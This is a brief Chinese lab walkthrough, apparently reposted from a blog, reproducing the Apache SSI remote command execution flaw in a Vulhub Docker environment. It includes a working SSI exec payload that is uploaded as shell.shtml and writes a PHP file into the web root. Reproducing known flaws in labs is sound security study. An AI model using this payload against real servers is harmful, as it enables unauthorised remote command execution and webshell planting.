本文介绍: 这里已经执行成功了,注意这里需要加入/upload.php。
Apache SSI 远程命令执行漏洞
1.cd到ssi-rce
cd /opt/vulhub/httpd/ssi-rce/
2.执行docker-compose up -d
docker-compose up -d
3.查看靶场是否开启成功
dooker ps
拉取成功了
4.访问url
这里已经执行成功了,注意这里需要加入/upload.php
5.写入一句话木马
<!–#exec cmd=”echo ‘<?php phpinfo(); ?>’ > /var/www/html/this.php” –>
6.提交查询
7.点击shell.shtml
8.查看是否写入成功
docker exec -it ssi-rce_apache_1 /bin/bash
9.获取phpinfo
原文地址:https://blog.csdn.net/qq_59020256/article/details/135448667
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。
如若转载,请注明出处:http://www.7code.cn/show_53252.html
如若内容造成侵权/违法违规/事实不符,请联系代码007邮箱:suwngjj01@126.com进行投诉反馈,一经查实,立即删除!
声明:本站所有文章,如无特殊说明或标注,均为本站原创发布。任何个人或组织,在未征得本站同意时,禁止复制、盗用、采集、发布本站内容到任何网站、书籍等各类媒体平台。如若本站内容侵犯了原著者的合法权益,可联系我们进行处理。